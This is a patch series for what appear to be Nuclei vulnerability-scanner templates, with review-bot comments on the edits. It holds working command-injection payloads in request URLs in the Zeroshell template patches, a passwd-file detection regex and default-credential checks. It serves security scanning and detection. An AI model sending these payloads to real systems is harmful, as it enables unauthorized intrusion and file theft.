default-logins/frps/frp-default-login.yaml by mp
---
default-logins/frps/frp-default-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml
index 280c198e62..86875c9a39 100644
--- a/default-logins/frps/frp-default-login.yaml
+++ b/default-logins/frps/frp-default-login.yaml
@@ -8,7 +8,7 @@ info:
tags: frp,default-login
reference: https://github.com/fatedier/frp/issues/1840
classification:
- cwe-id: 798
+ cwe-id: CWE-798
requests:
- raw:
From 24c85358ae9dca0fa8be7e66cd9683b125821cbd Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:48:31 -0500
Subject: [PATCH 028/259] Enhancement:
default-logins/gitlab/gitlab-weak-login.yaml by mp
---
default-logins/gitlab/gitlab-weak-login.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
index 47eeafcaf1..199f3f00ae 100644
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -12,7 +12,7 @@ info:
metadata:
shodan-query: http.title:"GitLab"
classificaiton:
- cwe-id: 798
+ cwe-id: CWE-798
requests:
- raw:
From f149aeeafd250189ca40b3db3adaf84775b2d9d9 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Thu, 3 Mar 2022 15:49:20 -0500
Subject: [PATCH 029/259] Enhancement:
default-logins/glpi/glpi-default-login.yaml by mp
---
default-logins/glpi/glpi-default-login.yaml | 5 +++--
1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/default-logins/glpi/glpi-default-login.yaml b/default-logins/glpi/glpi-default-login.yaml
index 1871b41841..26612339e6 100644
--- a/default-logins/glpi/glpi-default-login.yaml
+++ b/default-logins/glpi/glpi-default-login.yaml
@@ -5,10 +5,11 @@ info:
author: andysvints
severity: high
tags: glpi,default-login
- description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
+ description: GLPI default login credentials were discovered. GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled.
reference: https://glpi-project.org/
classification:
- cwe-id: 798
+ cwe-id: CWE-798
+
requests:
- raw:
- |
From 6378a1ab1a2ef5c1b533c90648ed6302a3403b6c Mon Sep 17 00:00:00 2001
From: sullo
Date: Fri, 4 Mar 2022 15:58:39 -0500
Subject: [PATCH 030/259] Update CVSS information and text content
---
vulnerabilities/gitlab/gitlab-rce.yaml | 13 ++++++++-----
1 file changed, 8 insertions(+), 5 deletions(-)
diff --git a/vulnerabilities/gitlab/gitlab-rce.yaml b/vulnerabilities/gitlab/gitlab-rce.yaml
index b8a81b603a..8e2b327c8c 100644
--- a/vulnerabilities/gitlab/gitlab-rce.yaml
+++ b/vulnerabilities/gitlab/gitlab-rce.yaml
@@ -1,10 +1,11 @@
id: gitlab-rce
info:
- name: GitLab CE/EE Unauthenticated RCE using ExifTool
+ name: GitLab CE/EE Unauthenticated RCE Using ExifTool
author: pdteam
severity: critical
- description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
+ description: GitLab CE/EE contains a vulnreability which allows a specially crafted image passed to a file parser to perform a command execution attack. Versions impacted are between 11.9-13.8.7, 13.9-13.9.5, and 13.10-13.10.2.
+ remediation: Upgrade to versions 13.10.3, 13.9.6, 13.8.8, or higher.
reference:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
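Review bot: The new description misspells `vulnreability` and phrases the impact as "perform a command execution attack", which is awkward; suggest `description: GitLab CE/EE contains a vulnerability that allows a specially crafted image passed to a file parser to execute commands on the server. Affected versions are 11.9 to 13.8.7, 13.9 to 13.9.5, and 13.10 to 13.10.2.` The new `remediation:` line and the version ranges in the description agree with each other, and the CVSS change to `PR:N` in the next hunk matches the "Unauthenticated" wording of the name. The `info:` block continues past this hunk.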
@@ -12,8 +13,8 @@ info:
metadata:
shodan-query: http.title:"GitLab"
classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 9.90
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10.0
cve-id: CVE-2021-22205
cwe-id: CWE-20
tags: cve,cve2021,gitlab,rce,oast,intrusive
@@ -57,4 +58,6 @@ requests:
part: interactsh_request
group: 1
regex:
- - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
\ No newline at end of file
+ - '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
+
+# Enhanced by CS 2021/03/04
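Review bot: The trailer comment added at the end of the file, `# Enhanced by CS 2021/03/04`, carries the year 2021 while the commit is dated 4 Mar 2022 and every other trailer in this series uses the commit date; it should read `# Enhanced by CS 2022/03/04`. The rest of the hunk only restores the missing trailing newline.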
From ebaf71e728d01489ffc00b9caeb9321826e9f099 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:27:52 -0500
Subject: [PATCH 031/259] Enhancement: cves/2010/CVE-2010-1540.yaml by mp
---
cves/2010/CVE-2010-1540.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2010/CVE-2010-1540.yaml b/cves/2010/CVE-2010-1540.yaml
index 1bc5d76633..69956acbc1 100644
--- a/cves/2010/CVE-2010-1540.yaml
+++ b/cves/2010/CVE-2010-1540.yaml
@@ -1,16 +1,17 @@
id: CVE-2010-1540
+
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
- remediation: Upgrade to a supported version.
reference: |
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1540
+
requests:
- method: GET
path:
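Review bot: The `reference: |` line that this hunk keeps as context makes the references a single literal-block string (including the leading `- ` characters) rather than a YAML sequence, which is how every other template in this series declares them (for example CVE-2021-40868 uses `reference:` followed by list items). While the commit is reflowing this info block it should drop the `|` so tooling that iterates references gets a list: `reference:` then the two `- https://...` items unchanged.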
@@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
-# Enhanced by mp on 2022/02/15
+
+# Enhanced by mp on 2022/03/06
From 57ab79164bc6bc20c0e96f1c8b066b87a50de5e7 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:31:51 -0500
Subject: [PATCH 032/259] Enhancement: cves/2021/CVE-2021-40868.yaml by mp
---
cves/2021/CVE-2021-40868.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml
index c688da0f0f..681c7f8d84 100644
--- a/cves/2021/CVE-2021-40868.yaml
+++ b/cves/2021/CVE-2021-40868.yaml
@@ -1,10 +1,11 @@
id: CVE-2021-40868
info:
- name: Cloudron 6.2 Cross Site Scripting
+ name: Cloudron 6.2 Cross-Site Scripting
author: daffainfo
severity: medium
- description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to Reflected XSS.
+ description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
+ remediation: Upgrade to Cloudron 6.3 or higher.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
@@ -35,3 +36,5 @@ requests:
words:
- ''
part: body
+
+# Enhanced by mp on 2022/03/06
From b03d23b03548541f4d8f262e6b46a3463bef25cb Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:35:55 -0500
Subject: [PATCH 033/259] Enhancement: cves/2021/CVE-2021-40870.yaml by mp
---
cves/2021/CVE-2021-40870.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-40870.yaml b/cves/2021/CVE-2021-40870.yaml
index a7237d6d7c..71abc2a141 100644
--- a/cves/2021/CVE-2021-40870.yaml
+++ b/cves/2021/CVE-2021-40870.yaml
@@ -1,11 +1,12 @@
id: CVE-2021-40870
info:
- name: Aviatrix Controller 6.x before 6.5-1804.1922. RCE
+ name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
author: pikpikcu
severity: critical
- description: Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
+ description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
reference:
+ - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
- https://wearetradecraft.com/advisories/tc-2021-0002/
- https://nvd.nist.gov/vuln/detail/CVE-2021-40870
tags: cve,cve2021,rce,aviatrix
@@ -41,3 +42,5 @@ requests:
- "PHP Extension"
- "PHP Version"
condition: and
+
+# Enhanced by mp on 2022/03/06
From 0739f98dc7d37565c56e767c549f4c1c5b3cfa4b Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:41:44 -0500
Subject: [PATCH 034/259] Enhancement: cves/2021/CVE-2021-40875.yaml by mp
---
cves/2021/CVE-2021-40875.yaml | 14 ++++++++------
1 file changed, 8 insertions(+), 6 deletions(-)
diff --git a/cves/2021/CVE-2021-40875.yaml b/cves/2021/CVE-2021-40875.yaml
index 4144e75270..d018020152 100644
--- a/cves/2021/CVE-2021-40875.yaml
+++ b/cves/2021/CVE-2021-40875.yaml
@@ -1,16 +1,16 @@
id: CVE-2021-40875
info:
- name: Gurock TestRail Application files.md5 exposure
+ name: Gurock TestRail Application files.md5 Exposure
author: oscarintherocks
severity: medium
- description: Improper Access Control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
+ description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
tags: cve,cve2021,exposure,gurock,testrail
reference:
- https://github.com/SakuraSamuraii/derailed
- https://johnjhacking.com/blog/cve-2021-40875/
- https://www.gurock.com/testrail/tour/enterprise-edition
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
+ - htttps://github.com/SakuraSamuraii/derailed
+ - https://johnjhacking.com/blog/cve-2021-40875/
+ - https://www.gurock.com/testrail/tour/enterprise-edition
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
classification:
cve-id: CVE-2021-40875
metadata:
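Review bot: The re-added reference list introduces a typo in its first URL, `htttps://github.com/SakuraSamuraii/derailed`, which was correct in the removed lines; the new line should be `- https://github.com/SakuraSamuraii/derailed`. Since the only other change in this block is whitespace, the commit effectively breaks a working link.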
@@ -34,3 +34,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/06
From b20659acef6dcfbca98e547fb9af46fac917fb74 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:43:48 -0500
Subject: [PATCH 035/259] Enhancement: cves/2021/CVE-2021-40960.yaml by mp
---
cves/2021/CVE-2021-40960.yaml | 2 ++
1 file changed, 2 insertions(+)
diff --git a/cves/2021/CVE-2021-40960.yaml b/cves/2021/CVE-2021-40960.yaml
index 8702b53d29..74f5e5e2cc 100644
--- a/cves/2021/CVE-2021-40960.yaml
+++ b/cves/2021/CVE-2021-40960.yaml
@@ -30,3 +30,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/06
From 220bc5a35a9b87b77172f7826286aa121b6c0ca7 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:50:17 -0500
Subject: [PATCH 036/259] Enhancement: cves/2021/CVE-2021-40978.yaml by mp
---
cves/2021/CVE-2021-40978.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml
index 81ec5d959e..157e96c654 100644
--- a/cves/2021/CVE-2021-40978.yaml
+++ b/cves/2021/CVE-2021-40978.yaml
@@ -1,14 +1,15 @@
id: CVE-2021-40978
info:
- name: mkdocs 1.2.2 built-in dev-server allows directory traversal
+ name: MKdocs 1.2.2 Directory Traversal
author: pikpikcu
severity: high
reference:
+ - https://github.com/mkdocs/mkdocs/pull/2604
- https://github.com/nisdn/CVE-2021-40978
- https://nvd.nist.gov/vuln/detail/CVE-2021-40978
tags: cve,cve2021,mkdocs,lfi
- description: "** DISPUTED ** The mkdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain :sensitive information. NOTE: the vendor has disputed this as described in https://github.com/mkdocs/mkdocs/issues/2601.] and https://github.com/nisdn/CVE-2021-40978/issues/1."
+ description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
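Review bot: The new name and description spell the project "MKdocs" while the upstream project and the reference URLs spell it MkDocs; `name: MkDocs 1.2.2 Directory Traversal` and `description: The MkDocs 1.2.2 built-in dev-server ...` would match the references. The rewritten description also says the vendor's dispute is documented "(see references)", but the removed text pointed at mkdocs issue 2601 and the reference list now only adds pull 2604, so the dispute link the sentence relies on is no longer in the file; either add the issue URL to `reference:` or drop the parenthetical.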
@@ -31,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/06
From 739edecc0fd12f35d35e2696ed06dab52dcc35be Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:52:34 -0500
Subject: [PATCH 037/259] Enhancement: cves/2021/CVE-2021-41174.yaml by mp
---
cves/2021/CVE-2021-41174.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41174.yaml b/cves/2021/CVE-2021-41174.yaml
index 241b7b0b94..275fb22f63 100644
--- a/cves/2021/CVE-2021-41174.yaml
+++ b/cves/2021/CVE-2021-41174.yaml
@@ -1,10 +1,11 @@
id: CVE-2021-41174
info:
- name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering XSS
+ name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
+ remediation: Upgrade to 8.2.3 or higher.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
- https://nvd.nist.gov/vuln/detail/CVE-2021-41174
@@ -43,4 +44,6 @@ requests:
- type: regex
group: 1
regex:
- - '"subTitle":"Grafana ([a-z0-9.]+)'
\ No newline at end of file
+ - '"subTitle":"Grafana ([a-z0-9.]+)'
+
+# Enhanced by mp on 2022/03/06
From 92aa22ebe82458b8912d40f82fbe34114ebcd632 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 11:56:57 -0500
Subject: [PATCH 038/259] Enhancement: cves/2021/CVE-2021-41266.yaml by mp
---
cves/2021/CVE-2021-41266.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41266.yaml b/cves/2021/CVE-2021-41266.yaml
index 37b62119d8..9819fab0ae 100644
--- a/cves/2021/CVE-2021-41266.yaml
+++ b/cves/2021/CVE-2021-41266.yaml
@@ -5,7 +5,8 @@ info:
author: alevsk
severity: critical
description: |
- Minio console is a graphical user interface for the for MinIO operator. Minio itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled. All users on release v0.12.2 and before are affected and are advised to update to 0.12.3 or newer. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.
+ MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.
+ remediation: "Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41266
- https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
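Review bot: The rewritten description on the new side still carries the duplicated words "for the for" ("a graphical user interface for the for MinIO Operator"), which the rewrite should have cleaned up; the line should read `MinIO Console is a graphical user interface for the MinIO Operator. ...`. In the new remediation string, "by unset the ... environment variable" would read better as "by unsetting the ... environment variables". The double quotes around the remediation value are required because the text contains `automountServiceAccountToken: false`, which a plain scalar would mis-parse as a mapping.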
@@ -43,4 +44,6 @@ requests:
- type: word
part: header
words:
- - "token"
\ No newline at end of file
+ - "token"
+
+# Enhanced by mp on 2022/03/06
From 925f08ff7065a3402647692e149f7e81681679a3 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 12:01:47 -0500
Subject: [PATCH 039/259] Enhancement: cves/2021/CVE-2021-41277.yaml by mp
---
cves/2021/CVE-2021-41277.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41277.yaml b/cves/2021/CVE-2021-41277.yaml
index d47d490eac..77f4a745a7 100644
--- a/cves/2021/CVE-2021-41277.yaml
+++ b/cves/2021/CVE-2021-41277.yaml
@@ -4,7 +4,8 @@ info:
name: Metabase Local File Inclusion
author: 0x_Akoko
severity: critical
- description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
+ description: "Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded."
+ remediation: "This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application."
reference:
- https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
- https://nvd.nist.gov/vuln/detail/CVE-2021-41277
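Review bot: The new remediation line lost a digit in the second fixed version, "0.40.5 and .40.5"; the removed description gave the pair as 0.40.5 and 1.40.5, so it should be `remediation: "This issue is fixed in 0.40.5 and 1.40.5 and higher. If you are unable to upgrade immediately, ..."`. The new description also now says "local file inclusion security issue ... and potential local file inclusion", which repeats itself; one of the two mentions can go.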
@@ -33,4 +34,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/03/06
From d743fb7969ea95d414cf46ebf676d984f31011eb Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 12:04:24 -0500
Subject: [PATCH 040/259] Enhancement: cves/2021/CVE-2021-41291.yaml by mp
---
cves/2021/CVE-2021-41291.yaml | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-41291.yaml b/cves/2021/CVE-2021-41291.yaml
index b093e562b9..1b052e2df4 100644
--- a/cves/2021/CVE-2021-41291.yaml
+++ b/cves/2021/CVE-2021-41291.yaml
@@ -4,8 +4,9 @@ info:
name: ECOA Building Automation System - Directory Traversal Content Disclosure
author: gy741
severity: high
- description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
+ description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41291
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
tags: cve,cve2021,ecoa,lfi,traversal
@@ -25,3 +26,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
+
+# Enhanced by mp on 2022/03/06
From 2ad18547528bc7aaa8244ea88e592e0d7012517e Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Sun, 6 Mar 2022 12:04:57 -0500
Subject: [PATCH 041/259] Enhancement: cves/2010/CVE-2010-1601.yaml by mp
---
cves/2010/CVE-2010-1601.yaml | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/cves/2010/CVE-2010-1601.yaml b/cves/2010/CVE-2010-1601.yaml
index adea054fa7..23a11eb61b 100644
--- a/cves/2010/CVE-2010-1601.yaml
+++ b/cves/2010/CVE-2010-1601.yaml
@@ -1,16 +1,17 @@
id: CVE-2010-1601
+
info:
name: Joomla! Component JA Comment - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
- remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12236
- https://www.cvedetails.com/cve/CVE-2010-1601
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1601
+
requests:
- method: GET
path:
@@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
-# Enhanced by mp on 2022/02/15
+
+# Enhanced by mp on 2022/03/06
From 1667fd79cbecd8a0585eea3949d1c0ceb6a2634a Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 7 Mar 2022 03:05:17 +0530
Subject: [PATCH 042/259] Update kibana-panel.yaml
---
exposed-panels/kibana-panel.yaml | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/exposed-panels/kibana-panel.yaml b/exposed-panels/kibana-panel.yaml
index ad3530bfef..a8976daca7 100644
--- a/exposed-panels/kibana-panel.yaml
+++ b/exposed-panels/kibana-panel.yaml
@@ -13,14 +13,17 @@ requests:
path:
- "{{BaseURL}}/login"
+ redirects: true
+ max-redirects: 2
matchers-condition: or
matchers:
- type: word
part: body
words:
- "Kibana"
+ - "Elastic"
- - type: word
+ - type: regex
part: header
- words:
- - "Kbn-Name:"
+ regex:
+ - '(?i)(Kbn-Name)'
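Review bot: Adding the bare word "Elastic" to the body matcher under `matchers-condition: or` means any page that mentions Elastic (Elasticsearch front-ends, marketing text, other Elastic products) now reports as a Kibana panel, which will raise false positives for this info-level detection. Consider either a more specific string tied to the login page markup or combining it with the header match instead of letting it match on its own. The new header regex `(?i)(Kbn-Name)` also dropped the trailing colon that the old word matcher had and wraps the literal in a capture group that nothing consumes; `- '(?i)kbn-name:'` keeps the case-insensitivity while staying anchored to the header name.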
From 9587fcfcb8624873420af6964aea3977ea0be9a0 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 7 Mar 2022 03:36:21 +0530
Subject: [PATCH 043/259] Update CVE-2019-12725.yaml
---
cves/2019/CVE-2019-12725.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml
index a381601f64..6f6f713ad4 100644
--- a/cves/2019/CVE-2019-12725.yaml
+++ b/cves/2019/CVE-2019-12725.yaml
@@ -20,14 +20,17 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
+ - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: regex
+ part: body
regex:
- - "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
+ - "root:.*:0:0:"
# Enhanced by mp on 2022/02/04
From 5f9caa4418561aac503d50b3bee2e1b931f9cbdb Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 7 Mar 2022 03:37:03 +0530
Subject: [PATCH 044/259] Update CVE-2019-12725.yaml
---
cves/2019/CVE-2019-12725.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml
index 6f6f713ad4..3b92fcfa2f 100644
--- a/cves/2019/CVE-2019-12725.yaml
+++ b/cves/2019/CVE-2019-12725.yaml
@@ -2,7 +2,7 @@ id: CVE-2019-12725
info:
name: Zeroshell 3.9.0 Remote Command Execution
- author: dwisiswant0
+ author: dwisiswant0,akincibor
severity: critical
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
From fab7904544efd9e3c870d232640a2d5e74a21776 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 7 Mar 2022 03:37:29 +0530
Subject: [PATCH 045/259] Update kibana-panel.yaml
---
exposed-panels/kibana-panel.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/exposed-panels/kibana-panel.yaml b/exposed-panels/kibana-panel.yaml
index a8976daca7..74bef2b479 100644
--- a/exposed-panels/kibana-panel.yaml
+++ b/exposed-panels/kibana-panel.yaml
@@ -2,7 +2,7 @@ id: kibana-panel
info:
name: Kibana Panel Login
- author: petruknisme,daffainfo
+ author: petruknisme,daffainfo,c-sh0
severity: info
metadata:
shodan-query: http.title:"Kibana"
From eb0395422f172565d4b4208ca71affd25cf23953 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Mon, 7 Mar 2022 07:58:38 +0900
Subject: [PATCH 046/259] Create boa-web-fileread.yaml
---
boa-web-fileread.yaml | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 boa-web-fileread.yaml
diff --git a/boa-web-fileread.yaml b/boa-web-fileread.yaml
new file mode 100644
index 0000000000..fa74016601
--- /dev/null
+++ b/boa-web-fileread.yaml
@@ -0,0 +1,27 @@
+id: boa-web-fileRead
+
+info:
+ name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
+ author: 0x_Akoko
+ severity: high
+ description: The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials.
+ reference:
+ - https://www.exploit-db.com/exploits/42290
+ - https://www.cvedetails.com/cve/CVE-2017-9833
+ tags: boa,fileread,lfi
+
+requests:
+ - method: GET
+ path:
